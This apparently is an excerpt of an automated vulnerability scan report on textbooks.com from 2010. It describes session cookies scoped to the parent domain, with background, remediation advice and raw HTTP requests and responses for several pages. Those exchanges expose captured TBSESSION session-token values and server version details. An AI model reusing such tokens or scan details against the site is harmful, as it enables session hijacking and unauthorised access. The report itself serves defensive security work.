Set-Cookie: TBSESSION=GN%2Bu2RH0zu72InyE7yjEtHseOWko2s6C3Nnu%2Bel02ruAFXvxPxqzfstCuA9ufemgaVoW15o7ehfaiR3lXYev5Hl28gWQjGdp4r62cntl8Ppe%2BQB%2B%2F0PnTWSxzxnfeNqCXausL%2FDZQfxUHbZa9YobNMc8nhhywgxyfre46xwN%2FdJR8Nt8THau6QM%2FBcr5%2F541p6%2BsumwfXZERaEEcWeO7wcXn17Rv8%2FpFFZGks%2BIFbkjavKs9dmHpL7BrI2pt6sPQHd6b%2F2deduiP0eCPe1QyoIAGILwFRS1VriIsFzQzNIade%2BzmnH7SXXYtPwyEg9JZ4dcMkuab51A0Rbyy9BeTp%2FoQEc1rmertrtbWBb43SpmFMl1pXIEcwpTMwaOPsLcgAzKdCVWtHQM2y74Ilusj5dymYdWvCF0AFv72joZNh9xAOIj00moAbgiQvYm3YjgRybXPW9WGZyM%2BgfKSvc5swAJwYxW37jqjz99uCNVTm3zBmW39bUFF2gxAf3vZvMdxtqk5ozLzxiVXd0bxt4anKXczZx9bhqV9FBaehw5XylsCdUi3r%2Bvq1zaC5pHseIvr9%2BPEglegFQ%2B%2FcB%2Fdj5fO8ARg4iNt6%2FaYMgig5ah41Qu95hVCN7SsCNUFXdOlTgBfeobXgKKT0iSxNsimPxBfoTfpzMy%2Fby4BPcBbdT%2FfI1N3RhYOJLeAdCeujM8Zf2kK%2BQt5gzaEz7H0ARx%2FooJKRBqTMkKWw1Bbiu2usiUDsWDbH7mBiYYr5JoOUqU%2BgmlbkpdpH3IwQHihGE41zVNOEH44siHFWYUggG3CvTI3fDrDddZZgwv%2BaAdExM3QJScmaz2VVVGi7%2FXqU9OnyHVOusBLag9o5vRGT8SpjfoBv00CAehyb%2FnlDPlfmTR2ub2vbwjSxDFRz60oue41qDXfDZGyy8izPa293C2Uw98B2R7%2BxtYJBj895DBpW16w4bActPCnt2Fsxga7UPsKbwH5T5WruVPnmFOBV5GdnvIYNip%2Bt7kJhz1cg1pPGwRsVDHx5f4MMG70GQNe2HZGXDcb%2BPjlKHpSRYceIYzY1DbVka1dTaJ5HB7biPNlqni%2FRLgbvpxRYK4c4cUuwZw90NqaYAYBCZ2hXQBVYl%2FCi4xZnnjYBdK06nekOvzbvYBHOYXbbtnd4A1P0kMPaIJJEhLoeQBCR%2Bzb0%2Bs1d2Amp0nBVVDBvJEwSH6AeHJ2wNFvE%2BK9jjxqBBs0wqkLl%2F0OccXwsuWFBpSUUPPdJ4qm4Y8r%2FMp7FUkd6mjJblkV4kY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=9vc8KFkiyfVkIilGB6Y%3D; expires=Mon, 26-Dec-2011 13:53:30 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="ke
...[SNIP]...

3. Cookie scoped to parent domain
There are 29 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all of its subdomains. If you remove the explicit domain attribute from your Set-Cookie header, the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


3.1. http://www.textbooks.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=IUNU%2FCVo3e7OAi3monE7uCKuNyCjn5xqOcaCW%2FojlApqnsXvSUcUMOZl%2Fl8xqqJr9Y3Dw8PP2JICBiWM7Ak%2BHP9rNIzm%2FMoylv%2FVwIAvI140oSpVSBxpIYvn92zyqpwSPPrcGtTaexBsW5Chmrif7zJaJoACHS2EIIySIqSt2I0NV8n6nnhIPVo8RX%2FrUG2RBrQHWwa0R19c009fjgbYxmyPo%2B5NOetV8THje7FeH13zQI39TXIB9TIyBHQ1EB%2BXWVXQac0Ey45mygp%2Bt7iYST4atUOq%2Fl3U44mEfbjIRjKtyI1D%2BiXOv9w5IZLdyvQZjOnzlUvwem93ygYrsFZW5%2FjvekOHJEznxLWsbtI4zRDPLJZ66QRiax%2FUhM9TxI7Xf0lZ5L%2F10lsV7GmSA4J25Z1gGeA928TgjRf2T63g80GqRaftVJIA%2FHBd9QzmkHN%2FKa%2ByoG4hkOrtT2hOEaKk6Ke6Rj27ja%2BdHdb0GNwnZPZE1m5xvH5SZVFXHwBzTMv1BREEsKcH%2B0mWwEZ3faoX8ra5YYektLjd%2BnRRsiopnGuR2xNXAACIXxWM672Qarg82sA1Fesrsho3iH22CDsDaKzDZ3B0oF%2FJ%2FaiFWbkfgelNPYjkfOQ4sqgctsGj7%2FK1lub%2FdkTrgB5oX%2FemQDN53IOQAxOhT7OGDhDp%2Bt%2B1CL0ohB%2B4hN9Vye%2FHFzmjXj6v5r3L9GF24tjgLNgDc%2FthzEZHZrxBdWtHozBVeAaZHgKq2WQ8Et5pELcH8OR%2BaqH%2F6BEMH1NIsd9T9%2Bau52CbsvVuOVsXJuhbBFT4okHAFCKjUFtlFrqfP9ykwm0uU71U2eajIphvFjf5X%2F9qtHeimMNXB8MhOYfOJRTJ01R%2FuSqw%2B245%2BAYRvEGBePAT%2BNnXSLXzIhg1cMqYrmQED%2BFpNjdu7eIgMaByUCXYhYHTrpoKhnPZAV5%2FuevXai0LvCMC1QjNWN4e8EA788UJBDoacNBhtUTF1%2BFMUrf6hvzZ51cjKf%2FUrQ3U7TgH9hux7bP3D6ZdSNv3FJKyprgWHoHR4x82%2BiDXUckV42NLHqWtt9ki4EFpJN2PGZxxEVeMkakM9da9HHZDo%2BU4Lg5J%2FaZJ2aEDRyg8o4R9rmdnDC4WtwQ54hev%2FWEMylzZNyqIOqPjsyY2LrB3Akg0Xd3maRkS8%2Fs9Au3VfJ8SJnOLJoZVzmIaaL%2Bv2Pj5pIIhWLkUmR04UQ%2Fza3XsvHyiP0ryCWvhE4SwyTOBBkCL6PvopHc4qfH0cCTmYwqL7opoI6Q%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=O7IQMANG3VCTdpnhVXo%3D; expires=Mon, 26-Dec-2011 13:51:59 GMT; path=/; domain=.textbooks.com
Content-Length: 35362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.2. http://www.textbooks.com/Author/Peter_Vorderer.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Author/Peter_Vorderer.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Author/Peter_Vorderer.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=H01U36MSp2dZuiYXGjisaivMdUBgZaLhl4%2FnJGGLIw0eZsY%2BGwK8RLrTb0Mn7MlBojEDK1pCuEjD%2F4SI1V9tIZrtItqjVkwmuFxeNkXpLLphXwnqkLiewlO0zWNUBkZlheVezHXMZgLZQPEWG3uJFdFa3R4AaBmosszdTLbwSBeRufTyT7DmLHTmY5h6yDHjYtt9JPgoWW%2FdSnKXM5u6A%2Fmt5dpfuTcdZfhJZA4rRlDnz9vC64xjS%2FPUCLqvzcw2TSUoiwIX1WvWuTj6hZY3d8TPab0WekS2SMiB7c9KOZyuMA9rj9ruOpqDfOtb7FiwqPIuR7izBEvzhlkQibRlyYgD4xTcLczw5s4y6SdQa%2F5Y%2FMSdfq9y%2BlT8EdOSPVEFadz%2FZkz845z0jGCXfRvlQb9ey0nqEPZerPKAXaIQLq1eNTMm5k9fzdLUX4Z9AAbLP9rYik51SDvDcnT7QO6VgSwypJVzXF42pZsH16snj3Ir4DnTmfHkJ9XdOLa%2BASkH6jqLSjeR0uxlVn46oNiDql7qqsU1TlHw2uNhppz8tb7oP1k%2FyH0W5bm1%2FDYOPHSIfMc4XUcb3f4K6i5t6FKQ2Tv0jiPt76gJBjd3WvIPTrcFpbBVTcVSu7Qd4G5uq%2FQMzl7heE3aBbybUdd68hi3MwSdKlg2g%2BQBIp%2FEV%2B0hZNa3akd7Lcag7Rp9Yy%2FHSkg2efBneciWE5914OiJ5sXY874FeMSVGnZrMoVvoztI3T5RlxjY9lZ5c4aQ3Q4W5D6t3uW911wm10TGCKjQxdujRHUFOSNFmQoj0CGYVcObVqLQFJ4S7vQrbI%2Ffdloa5%2B1NpgMYC5ixSIG4e6N7BqyT97eESy8SEA3j%2FJd%2F4OX1BXmHG58Q74HA8NTsKLrIgiolu871V9eSwRT7J6fGx54s%2BtKQP1r5ma0z1xFYcGyzaztJaPwBXtDCWrXqjZ9AexjzaIE5GLWoo7bf0yAIlFjWiVLnX2FPyxKOcxJE3hP%2B%2FVe76wnw2DHFPjNKbzLGUdJwBRdhV4jSaYdtscek5Ei4058GEgjJieD4NTiFL97OuABKvt0pBc0cRTBH6rbzLmVnr46QCPHLgLxBFOBXgDUUxDKYGlBnppd5bSMp3a0wgyYHuRd%2BPl1PWlRO8761qzLi5maBr%2BIM9eh2%2B4cfNshfqxPP5bO2NXqaEkF179xjjC5LpJZIrrlhBNkEcmab4qfvz6XhhMkl6PO3flcm9JSwxSBzGJNKcf1Wkyh2U7HuJbBJtYzN9xU6Tv%2BT4Pc%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=C0ot1rm4AVmqgN2OAk8%3D; expires=Mon, 26-Dec-2011 13:53:04 GMT; path=/; domain=.textbooks.com
Content-Length: 48376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- START OF PAGE 12/26/20
...[SNIP]...

3.3. http://www.textbooks.com/BooksDescription.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BooksDescription.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BooksDescription.php?BKN=756724&SBC=CB0&mcid=XCS-Become-9780805853223-U&utm_medium=shoppingengine&utm_term=9780805853223U&utm_source=become HTTP/1.1
Host: www.textbooks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:44:21 GMT
Connection: close
Set-Cookie: BNG=deleted; expires=Sat, 26-Dec-2009 13:44:19 GMT; path=/
Set-Cookie: 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; expires=Tue, 25-Jan-2011 13:44:20 GMT; path=/
Set-Cookie: TBSESSION=JrxP960N4HQ7mADzP1D7yqF0fNX%2BR0clTNCcjEKeryEMxNgKFUiFfkJvGOkcESM4s6u2M9wn4Mp0eRxMk2zoO7gpAukCPAS47mKQ7RdsfA6qfnrndZzf40lVm5GwdoII1X%2FOU6gdYzFRpWRB72Nh2BnyY77V7GlCiIC740scKoPvcPhyClreKV%2FjFSfPbdPqRfrQIBVLVKbto66IzMi6Mu3h%2FcDrsNX5UudWvpdhNY5%2Bncv%2F3CGwzVpwrbWcvpYK%2FKEubIHcYREUgPGOaTiojy%2FzUQ5bVgATj5FVT%2FTggUeshMviDyO8%2FDi2u4i4WZXO37DRyxznP7W1AxSZMCbtdz%2F6leTHX25wztUnoW5v6PxdgaKOgvHoy8zT26FS1ub4D9yxxpu4RrCJCxpEtfckl4TaucHvWO8QetcLcTp58oqeH0kUQ0aftAWwWK9zgJ1%2FwxNppv63COoFEfLhXopwvkWAyPmrJnDadLs91HLXpfaEvPBxOeAMXAmaP6wvZd0Rutsh7ubiGuFDbfsQcnRXckp3Zv4dBZsXrQq%2FAR6oX9jY762kpGuBc%2Fzig8kEdzmoIr6ppRreuRZflmL8KLLYOI%2B5s7dZ915IMDlggsZX4x1AD90Te%2BdaYyA73n%2Fm%2F1JGY283ScqT1f3fb80S8M6QEhgTEGa5LuNLs7S9ZSIQUGje4CYjCBJhxFI7uvkERtdhpoAxBfflkxVFj9xgQu0k2Z0zP24cM42vrPcRirLWAGvu0XPtgwx1YrQTrCBy9vdjdAHgSKzeBSMj2iVkd9aZuxoe8HUCfENbBPaaVFrlSBRCSPoz2X%2FedX%2B%2Fr%2FDmYkSD0D%2B1XybKRtasGTxPpNKp8Up%2Ft1naz8ZzaU5qKJ0OCkv3CKnmKtpTnhVOXiwg8%2FbFpVCNtkIj80WoNu9DEH6xLC4nve%2BcnKGkJVjfBm59WWI%2FxiLbKLojbK5rMoOt1IxpUoEDCajy5tR3u10meUmFUBje4VEWr7MMYmM7DucLesIzbcluQJdVpbBmZLYD2GLQ%2F7LWzgGhPCkj1pFYFtCm7oP3g45E9TZvFomoyJsHA0AVB%2BOF%2FjFPfEDh%2B50F%2BAUTj%2FWcIMn2vB%2BYT5MGse7JqPTvh7rgkKPsDWozH63rLzr6RTK4i%2Fh85gX4%2Ft3RAFxG8LtSmX44znQBBzNc32eNyKjqwj8ZaOpV9gXkK2%2BJhJ6SP3cMOJc%2B96CRisy7mmFSE5odQO5DJNaS5iIs3Brs3B5hjFpsZI7dZg9F%2BJ9w%2FT3qfQlIkUWHsMGOmz0lAbK%2BMyzWAOj9tznYP8QeuQPB6Q%3D%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=mwIrsiZ%2BRpZU9lHz%2BTc%3D; expires=Mon, 26-Dec-2011 13:44:20 GMT; path=/; domain=.textbooks.com
Set-Cookie: TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; expires=Mon, 26-Dec-2011 13:44:21 GMT; path=/; domain=.textbooks.com
Content-Length: 55234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="keyw
...[SNIP]...

3.4. http://www.textbooks.com/BuyBack-Search.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BuyBack-Search.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BuyBack-Search.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:01 GMT
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:01 GMT
